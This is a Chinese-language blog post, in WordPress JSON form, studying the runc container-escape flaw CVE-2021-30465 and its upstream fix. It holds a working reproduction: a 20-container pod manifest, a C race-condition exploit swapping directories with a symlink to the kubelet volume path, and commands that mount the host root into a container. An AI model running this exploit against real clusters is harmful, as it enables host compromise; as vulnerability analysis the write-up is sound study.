{"id":413,"date":"2023-03-11T22:15:51","date_gmt":"2023-03-11T14:15:51","guid":{"rendered":"https:\/\/h4ckm310n.com\/?p=413"},"modified":"2023-07-04T17:18:05","modified_gmt":"2023-07-04T09:18:05","slug":"cve-2021-30465%e5%ad%a6%e4%b9%a0","status":"publish","type":"post","link":"https:\/\/h4ckm310n.com\/?p=413","title":{"rendered":"CVE-2021-30465\u5b66\u4e60"},"content":{"rendered":"

<\/p>\n

\u6f0f\u6d1e\u5206\u6790<\/h4>\n

CVE-2021-30465\u662f\u4e00\u4e2arunc\u6f0f\u6d1e\uff0c\u5229\u7528\u8fd9\u4e2a\u6f0f\u6d1e\u53ef\u4ee5\u901a\u8fc7\u6761\u4ef6\u7ade\u4e89\u653b\u51fb\u6765\u5c06\u5bbf\u4e3b\u7684\u76ee\u5f55\u6302\u8f7d\u5230\u5bb9\u5668\u4e2d\u3002<\/p>\n

\u5728\u5bb9\u5668\u4e2d\u6302\u8f7dvolume\u4e4b\u524d\uff0crunc\u4f1a\u5148\u8c03\u7528SecureJoin()\u6765\u68c0\u67e5\u8def\u5f84\u5e76\u62fc\u63a5\u5230\u5bb9\u5668\u7684\u6839\u76ee\u5f55\u4e0b\uff0c\u5982\u679c\u8def\u5f84\u662f\u4e00\u4e2a\u7b26\u53f7\u94fe\u63a5\uff0c\u5219\u4f1a\u66ff\u6362\u6210\u8be5\u7b26\u53f7\u94fe\u63a5\u6307\u5411\u7684\u5bf9\u5e94\u8def\u5f84[1.1]\u3002<\/p>\n

case \"tmpfs\":\r\n    copyUp := m.Extensions&configs.EXT_COPYUP == configs.EXT_COPYUP\r\n    tmpDir := \"\"\r\n    \/\/ dest might be an absolute symlink, so it needs\r\n    \/\/ to be resolved under rootfs.\r\n    dest, err := securejoin.SecureJoin(rootfs, m.Destination)\r\n    if err != nil {\r\n        return err\r\n    }\r\n    m.Destination = dest\r\n    stat, err := os.Stat(dest)\r\n    if err != nil {\r\n        if err := os.MkdirAll(dest, 0755); err != nil {\r\n            return err\r\n        }\r\n    }\r\n    ......\r\n    if copyUp {\r\n        if err := fileutils.CopyDirectory(dest, tmpDir); err != nil {\r\n            errMsg := fmt.Errorf(\"tmpcopyup: failed to copy %s to %s: %v\", dest, tmpDir, err)\r\n            if err1 := unix.Unmount(tmpDir, unix.MNT_DETACH); err1 != nil {\r\n                return newSystemErrorWithCausef(err1, \"tmpcopyup: %v: failed to unmount\", errMsg)\r\n            }\r\n            return errMsg\r\n        }\r\n        if err := unix.Mount(tmpDir, dest, \"\", unix.MS_MOVE, \"\"); err != nil {\r\n            errMsg := fmt.Errorf(\"tmpcopyup: failed to move mount %s to %s: %v\", tmpDir, dest, err)\r\n            if err1 := unix.Unmount(tmpDir, unix.MNT_DETACH); err1 != nil {\r\n                return newSystemErrorWithCausef(err1, \"tmpcopyup: %v: failed to unmount\", errMsg)\r\n            }\r\n            return errMsg\r\n        }\r\n    }\r\n<\/pre>\n
\u901a\u8fc7\u6761\u4ef6\u7ade\u4e89\u7684\u65b9\u5f0f\uff0c\u53ef\u4ee5\u5728\u8def\u5f84\u68c0\u67e5\u548c\u6302\u8f7d\u64cd\u4f5c\u4e4b\u95f4\u5c06\u6b63\u5e38\u8def\u5f84\u66ff\u6362\u4e3a\u7b26\u53f7\u94fe\u63a5\u3002\u5728\u68c0\u67e5\u9636\u6bb5\uff0c\u8def\u5f84\u8fd8\u4e0d\u662f\u7b26\u53f7\u94fe\u63a5\uff0c\u6240\u4ee5\u4e0d\u4f1a\u7ecf\u8fc7\u5904\u7406\uff1b\u800c\u5728\u68c0\u67e5\u4e4b\u540e\u3001\u6302\u8f7d\u4e4b\u524d\uff0c\u5c06\u8def\u5f84\u66ff\u6362\u4e3a\u7b26\u53f7\u94fe\u63a5\uff0c\u8fd9\u6837\u8fd9\u4e2a\u7b26\u53f7\u94fe\u63a5\u6307\u5411\u7684\u5bbf\u4e3b\u7cfb\u7edf\u7684\u8def\u5f84\u5c31\u4f1a\u88ab\u6302\u8f7d\u5230\u5bb9\u5668\u4e2d\u3002<\/p>\n
\u6f0f\u6d1e\u590d\u73b0<\/h4>\n
\u7cfb\u7edf\uff1aUbuntu 20.04
\nKubernetes\uff1a1.21.0
\ncontainerd\uff1a1.4.4<\/p>\n
\u521b\u5efa\u4e00\u4e2a\u5305\u542b\u591a\u4e2a\u5bb9\u5668\u7684pod\uff0c\u6211\u8fd9\u91cc\u5305\u542b\u4e8620\u4e2a\uff0c\u914d\u7f6e\u6587\u4ef6\u5185\u5bb9\u5982\u4e0b\uff1a<\/p>\n
apiVersion: v1\r\nkind: Pod\r\nmetadata:\r\n    name: pod1\r\nspec:\r\n    terminationGracePeriodSeconds: 1\r\n    containers:\r\n    - name: c1\r\n      image: ubuntu:latest\r\n      command: [ \"\/bin\/sleep\", \"inf\" ]\r\n      volumeMounts:\r\n        - name: test1\r\n          mountPath: \/test1\r\n        - name: test2\r\n          mountPath: \/test2\r\n    - name: c2\r\n      image: abc.cba\/aaa:latest\r\n      command: [ \"\/bin\/sleep\", \"inf\" ]\r\n      volumeMounts:\r\n        - name: test1\r\n          mountPath: \/test1\r\n        - name: test2\r\n          mountPath: \/test1\/mnt1\r\n        - name: test2\r\n          mountPath: \/test1\/mnt2\r\n        - name: test2\r\n          mountPath: \/test1\/mnt3\r\n        - name: test2\r\n          mountPath: \/test1\/mnt4\r\n        - name: test2\r\n          mountPath: \/test1\/zzz\r\n    - name: c3\r\n      image: abc.cba\/aaa:latest\r\n      command: [ \"\/bin\/sleep\", \"inf\" ]\r\n      volumeMounts:\r\n        - name: test1\r\n          mountPath: \/test1\r\n        - name: test2\r\n          mountPath: \/test1\/mnt1\r\n        - name: test2\r\n          mountPath: \/test1\/mnt2\r\n        - name: test2\r\n          mountPath: \/test1\/mnt3\r\n        - name: test2\r\n          mountPath: \/test1\/mnt4\r\n        - name: test2\r\n          mountPath: \/test1\/zzz\r\n    - name: c4\r\n      image: abc.cba\/aaa:latest\r\n      command: [ \"\/bin\/sleep\", \"inf\" ]\r\n      volumeMounts:\r\n        - name: test1\r\n          mountPath: \/test1\r\n        - name: test2\r\n          mountPath: \/test1\/mnt1\r\n        - name: test2\r\n          mountPath: \/test1\/mnt2\r\n        - name: test2\r\n          mountPath: \/test1\/mnt3\r\n        - name: test2\r\n          mountPath: \/test1\/mnt4\r\n        - name: test2\r\n          mountPath: \/test1\/zzz\r\n    - name: c5\r\n      image: abc.cba\/aaa:latest\r\n      command: [ \"\/bin\/sleep\", \"inf\" ]\r\n      volumeMounts:\r\n        - name: test1\r\n          mountPath: \/test1\r\n        - name: test2\r\n          mountPath: \/test1\/mnt1\r\n        - name: test2\r\n          mountPath: \/test1\/mnt2\r\n        - name: test2\r\n          mountPath: \/test1\/mnt3\r\n        - name: test2\r\n          mountPath: \/test1\/mnt4\r\n        - name: test2\r\n          mountPath: \/test1\/zzz\r\n    - name: c6\r\n      image: abc.cba\/aaa:latest\r\n      command: [ \"\/bin\/sleep\", \"inf\" ]\r\n      volumeMounts:\r\n        - name: test1\r\n          mountPath: \/test1\r\n        - name: test2\r\n          mountPath: \/test1\/mnt1\r\n        - name: test2\r\n          mountPath: \/test1\/mnt2\r\n        - name: test2\r\n          mountPath: \/test1\/mnt3\r\n        - name: test2\r\n          mountPath: \/test1\/mnt4\r\n        - name: test2\r\n          mountPath: \/test1\/zzz\r\n    - name: c7\r\n      image: abc.cba\/aaa:latest\r\n      command: [ \"\/bin\/sleep\", \"inf\" ]\r\n      volumeMounts:\r\n        - name: test1\r\n          mountPath: \/test1\r\n        - name: test2\r\n          mountPath: \/test1\/mnt1\r\n        - name: test2\r\n          mountPath: \/test1\/mnt2\r\n        - name: test2\r\n          mountPath: \/test1\/mnt3\r\n        - name: test2\r\n          mountPath: \/test1\/mnt4\r\n        - name: test2\r\n          mountPath: \/test1\/zzz\r\n    - name: c8\r\n      image: abc.cba\/aaa:latest\r\n      command: [ \"\/bin\/sleep\", \"inf\" ]\r\n      volumeMounts:\r\n        - name: test1\r\n          mountPath: \/test1\r\n        - name: test2\r\n          mountPath: \/test1\/mnt1\r\n        - name: test2\r\n          mountPath: \/test1\/mnt2\r\n        - name: test2\r\n          mountPath: \/test1\/mnt3\r\n        - name: test2\r\n          mountPath: \/test1\/mnt4\r\n        - name: test2\r\n          mountPath: \/test1\/zzz\r\n    - name: c9\r\n      image: abc.cba\/aaa:latest\r\n      command: [ \"\/bin\/sleep\", \"inf\" ]\r\n      volumeMounts:\r\n        - name: test1\r\n          mountPath: \/test1\r\n        - name: test2\r\n          mountPath: \/test1\/mnt1\r\n        - name: test2\r\n          mountPath: \/test1\/mnt2\r\n        - name: test2\r\n          mountPath: \/test1\/mnt3\r\n        - name: test2\r\n          mountPath: \/test1\/mnt4\r\n        - name: test2\r\n          mountPath: \/test1\/zzz\r\n    - name: c10\r\n      image: abc.cba\/aaa:latest\r\n      command: [ \"\/bin\/sleep\", \"inf\" ]\r\n      volumeMounts:\r\n        - name: test1\r\n          mountPath: \/test1\r\n        - name: test2\r\n          mountPath: \/test1\/mnt1\r\n        - name: test2\r\n          mountPath: \/test1\/mnt2\r\n        - name: test2\r\n          mountPath: \/test1\/mnt3\r\n        - name: test2\r\n          mountPath: \/test1\/mnt4\r\n        - name: test2\r\n          mountPath: \/test1\/zzz\r\n    - name: c11\r\n      image: abc.cba\/aaa:latest\r\n      command: [ \"\/bin\/sleep\", \"inf\" ]\r\n      volumeMounts:\r\n        - name: test1\r\n          mountPath: \/test1\r\n        - name: test2\r\n          mountPath: \/test1\/mnt1\r\n        - name: test2\r\n          mountPath: \/test1\/mnt2\r\n        - name: test2\r\n          mountPath: \/test1\/mnt3\r\n        - name: test2\r\n          mountPath: \/test1\/mnt4\r\n        - name: test2\r\n          mountPath: \/test1\/zzz\r\n    - name: c12\r\n      image: abc.cba\/aaa:latest\r\n      command: [ \"\/bin\/sleep\", \"inf\" ]\r\n      volumeMounts:\r\n        - name: test1\r\n          mountPath: \/test1\r\n        - name: test2\r\n          mountPath: \/test1\/mnt1\r\n        - name: test2\r\n          mountPath: \/test1\/mnt2\r\n        - name: test2\r\n          mountPath: \/test1\/mnt3\r\n        - name: test2\r\n          mountPath: \/test1\/mnt4\r\n        - name: test2\r\n          mountPath: \/test1\/zzz\r\n    - name: c13\r\n      image: abc.cba\/aaa:latest\r\n      command: [ \"\/bin\/sleep\", \"inf\" ]\r\n      volumeMounts:\r\n        - name: test1\r\n          mountPath: \/test1\r\n        - name: test2\r\n          mountPath: \/test1\/mnt1\r\n        - name: test2\r\n          mountPath: \/test1\/mnt2\r\n        - name: test2\r\n          mountPath: \/test1\/mnt3\r\n        - name: test2\r\n          mountPath: \/test1\/mnt4\r\n        - name: test2\r\n          mountPath: \/test1\/zzz\r\n    - name: c14\r\n      image: abc.cba\/aaa:latest\r\n      command: [ \"\/bin\/sleep\", \"inf\" ]\r\n      volumeMounts:\r\n        - name: test1\r\n          mountPath: \/test1\r\n        - name: test2\r\n          mountPath: \/test1\/mnt1\r\n        - name: test2\r\n          mountPath: \/test1\/mnt2\r\n        - name: test2\r\n          mountPath: \/test1\/mnt3\r\n        - name: test2\r\n          mountPath: \/test1\/mnt4\r\n        - name: test2\r\n          mountPath: \/test1\/zzz\r\n    - name: c15\r\n      image: abc.cba\/aaa:latest\r\n      command: [ \"\/bin\/sleep\", \"inf\" ]\r\n      volumeMounts:\r\n        - name: test1\r\n          mountPath: \/test1\r\n        - name: test2\r\n          mountPath: \/test1\/mnt1\r\n        - name: test2\r\n          mountPath: \/test1\/mnt2\r\n        - name: test2\r\n          mountPath: \/test1\/mnt3\r\n        - name: test2\r\n          mountPath: \/test1\/mnt4\r\n        - name: test2\r\n          mountPath: \/test1\/zzz\r\n    - name: c16\r\n      image: abc.cba\/aaa:latest\r\n      command: [ \"\/bin\/sleep\", \"inf\" ]\r\n      volumeMounts:\r\n        - name: test1\r\n          mountPath: \/test1\r\n        - name: test2\r\n          mountPath: \/test1\/mnt1\r\n        - name: test2\r\n          mountPath: \/test1\/mnt2\r\n        - name: test2\r\n          mountPath: \/test1\/mnt3\r\n        - name: test2\r\n          mountPath: \/test1\/mnt4\r\n        - name: test2\r\n          mountPath: \/test1\/zzz\r\n    - name: c17\r\n      image: abc.cba\/aaa:latest\r\n      command: [ \"\/bin\/sleep\", \"inf\" ]\r\n      volumeMounts:\r\n        - name: test1\r\n          mountPath: \/test1\r\n        - name: test2\r\n          mountPath: \/test1\/mnt1\r\n        - name: test2\r\n          mountPath: \/test1\/mnt2\r\n        - name: test2\r\n          mountPath: \/test1\/mnt3\r\n        - name: test2\r\n          mountPath: \/test1\/mnt4\r\n        - name: test2\r\n          mountPath: \/test1\/zzz\r\n    - name: c18\r\n      image: abc.cba\/aaa:latest\r\n      command: [ \"\/bin\/sleep\", \"inf\" ]\r\n      volumeMounts:\r\n        - name: test1\r\n          mountPath: \/test1\r\n        - name: test2\r\n          mountPath: \/test1\/mnt1\r\n        - name: test2\r\n          mountPath: \/test1\/mnt2\r\n        - name: test2\r\n          mountPath: \/test1\/mnt3\r\n        - name: test2\r\n          mountPath: \/test1\/mnt4\r\n        - name: test2\r\n          mountPath: \/test1\/zzz\r\n    - name: c19\r\n      image: abc.cba\/aaa:latest\r\n      command: [ \"\/bin\/sleep\", \"inf\" ]\r\n      volumeMounts:\r\n        - name: test1\r\n          mountPath: \/test1\r\n        - name: test2\r\n          mountPath: \/test1\/mnt1\r\n        - name: test2\r\n          mountPath: \/test1\/mnt2\r\n        - name: test2\r\n          mountPath: \/test1\/mnt3\r\n        - name: test2\r\n          mountPath: \/test1\/mnt4\r\n        - name: test2\r\n          mountPath: \/test1\/zzz\r\n    - name: c20\r\n      image: abc.cba\/aaa:latest\r\n      command: [ \"\/bin\/sleep\", \"inf\" ]\r\n      volumeMounts:\r\n        - name: test1\r\n          mountPath: \/test1\r\n        - name: test2\r\n          mountPath: \/test1\/mnt1\r\n        - name: test2\r\n          mountPath: \/test1\/mnt2\r\n        - name: test2\r\n          mountPath: \/test1\/mnt3\r\n        - name: test2\r\n          mountPath: \/test1\/mnt4\r\n        - name: test2\r\n          mountPath: \/test1\/zzz\r\n    volumes:\r\n        - name: test1\r\n          emptyDir:\r\n            medium: \"Memory\"\r\n        - name: test2\r\n          emptyDir:\r\n            medium: \"Memory\"\r\n<\/pre>\n
\u53ef\u4ee5\u770b\u5230\u9664\u4e86\u7b2c\u4e00\u4e2a\u5bb9\u5668\u4ee5\u5916\uff0c\u5176\u4ed6\u5bb9\u5668\u7684\u955c\u50cf\u90fd\u662f\u65e0\u6548\u7684\uff0c\u6bcf\u4e2a\u5bb9\u5668\u90fd\u6302\u8f7d\u4e86\u4e00\u4e2atest1\u5377\u548c5\u4e2atest2\u5377\u3002
\n\u83b7\u53d6\u521b\u5efa\u597d\u7684pod\u7684UID\uff1a<\/p>\n
sudo kubectl get pod pod1 -o yaml | grep uid\r\n<\/pre>\n
\u7f16\u5199exp\uff0c\u5176\u4e2d\u768424a602eb-62e2-47dd-a083-9f44489582d6\u4e3a\u521a\u521a\u83b7\u53d6\u7684UID\uff1a<\/p>\n
#define _GNU_SOURCE\r\n#include <fcntl.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <sys\/types.h>\r\n#include <sys\/stat.h>\r\n#include <unistd.h>\r\n#include <sys\/syscall.h>\r\n#include <sys\/wait.h>\r\n\r\nint main(int argc, char *argv[]) {\r\n    char *name_mnts[] = {\"mnt1\", \"mnt2\", \"mnt3\", \"mnt4\"};\r\n    char *name_tmps[] = {\"mnt-tmp1\", \"mnt-tmp2\", \"mnt-tmp3\", \"mnt-tmp4\"};\r\n    char *ld = \"\/var\/lib\/kubelet\/pods\/24a602eb-62e2-47dd-a083-9f44489582d6\/volumes\/kubernetes.io~empty-dir\/\";\r\n\r\n    int dirfd = open(\".\", O_DIRECTORY|O_CLOEXEC);\r\n\r\n    pid_t pid;\r\n    int i;\r\n    for (i=0; i<4; ++i)\r\n    {\r\n        pid = fork();\r\n        if (pid == 0)\r\n            break;\r\n    }\r\n\r\n    if (pid != 0)\r\n        wait(NULL);\r\n    else {\r\n        mkdir(name_mnts[i], 0755);\r\n        symlink(ld, name_tmps[i]);\r\n        while (1)\r\n            renameat2(dirfd, name_mnts[i], dirfd, name_tmps[i], RENAME_EXCHANGE);\r\n    }\r\n    return 0;\r\n}\r\n<\/pre>\n
\u5c06\u7f16\u8bd1\u597d\u7684exp\u6587\u4ef6\u653e\u5230c1\u5bb9\u5668\u4e2d\u7684\/test1\u76ee\u5f55\u4e0b\uff0c\u7136\u540e\u521b\u5efa\u4e00\u4e2a\u7b26\u53f7\u94fe\u63a5\uff1a<\/p>\n
ln -s \/ \/test2\/test2\r\n<\/pre>\n
\u63a5\u7740cd\u5230\/test1\u76ee\u5f55\uff0c\u8fd0\u884cexp\u3002exp\u5f00\u59cb\u8fd0\u884c\u4e4b\u540e\uff0c\u56de\u5230\u5bbf\u4e3b\uff0c\u66f4\u65b0\u5176\u4ed6\u5bb9\u5668\u7684\u955c\u50cf\u4f7f\u5b83\u4eec\u542f\u52a8\uff1a<\/p>\n
for c in {2..20}; do\r\n    sudo kubectl set image pod pod1 c$c=ubuntu:latest\r\ndone\r\n<\/pre>\n
\"\"<\/p>\n
\u5217\u51fa\u6bcf\u4e2a\u5bb9\u5668\u7684\/test1\/zzz\u76ee\u5f55\u4e0b\u7684\u5185\u5bb9\uff1a<\/p>\n
for c in {2..20}; do\r\n    echo c$c\r\n    sudo kubectl exec -it pod\/pod1 -c c$c -- ls \/test1\/zzz\r\ndone\r\n<\/pre>\n
\"\"<\/p>\n
\u5728\u4e0a\u9762\u7684\u8f93\u51fa\u7ed3\u679c\u4e2d\uff0c\u53ef\u4ee5\u770b\u5230c20\u6210\u529f\u83b7\u53d6\u5230\u4e86\u5bbf\u4e3b\u6839\u76ee\u5f55\u7684\u5185\u5bb9\u3002<\/p>\n
\u5b98\u65b9\u4fee\u590d<\/h4>\n
\u5728\u6302\u8f7d\u4e4b\u524d\uff0crunc\u4f1a\u5148\u68c0\u67e5\u8def\u5f84\u5728\/proc\u4e2d\u5bf9\u5e94\u7684fd\uff0c\u786e\u4fddfd\u6307\u5411\u7684\u8def\u5f84\u548c\u6302\u8f7d\u7684\u8def\u5f84\u4e00\u81f4\uff0c\u4ece\u800c\u907f\u514d\u7b26\u53f7\u94fe\u63a5[3.1]\u3002<\/p>\n
fh, err := os.OpenFile(path, unix.O_PATH|unix.O_CLOEXEC, 0)\r\nif err != nil {\r\n    return fmt.Errorf(\"open o_path procfd: %w\", err)\r\n}\r\ndefer fh.Close()\r\n\r\n\/\/ Double-check the path is the one we expected.\r\nprocfd := \"\/proc\/self\/fd\/\" + strconv.Itoa(int(fh.Fd()))\r\nif realpath, err := os.Readlink(procfd); err != nil {\r\n    return fmt.Errorf(\"procfd verification failed: %w\", err)\r\n} else if realpath != path {\r\n    return fmt.Errorf(\"possibly malicious path detected -- refusing to operate on %s\", realpath)\r\n}\r\n<\/pre>\n
\u53c2\u8003<\/h4>\n
[1.1] https:\/\/github.com\/opencontainers\/runc\/blob\/v1.0.0-rc93\/libcontainer\/rootfs_linux.go#L340<\/a>
\n[2.1] https:\/\/blog.champtar.fr\/runc-symlink-CVE-2021-30465\/<\/a>
\n[3.1] https:\/\/github.com\/opencontainers\/runc\/commit\/0ca91f44f1664da834bc61115a849b56d22f595f<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_uag_custom_page_level_css":"","site-sidebar-layout":"default","site-content-layout":"default","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","ast-disable-related-posts":"","theme-transparent-header-meta":"default","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[16,6],"tags":[],"class_list":["post-413","post","type-post","status-publish","format-standard","hentry","category-16","category-6"],"uagb_featured_image_src":{"full":false,"thumbnail":false,"medium":false,"medium_large":false,"large":false,"1536x1536":false,"2048x2048":false},"uagb_author_info":{"display_name":"h4ckm310n","author_link":"https:\/\/h4ckm310n.com\/?author=1"},"uagb_comment_info":0,"uagb_excerpt":null,"_links":{"self":[{"href":"https:\/\/h4ckm310n.com\/index.php?rest_route=\/wp\/v2\/posts\/413","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ckm310n.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ckm310n.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ckm310n.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ckm310n.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=413"}],"version-history":[{"count":4,"href":"https:\/\/h4ckm310n.com\/index.php?rest_route=\/wp\/v2\/posts\/413\/revisions"}],"predecessor-version":[{"id":512,"href":"https:\/\/h4ckm310n.com\/index.php?rest_route=\/wp\/v2\/posts\/413\/revisions\/512"}],"wp:attachment":[{"href":"https:\/\/h4ckm310n.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=413"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ckm310n.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=413"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ckm310n.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=413"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}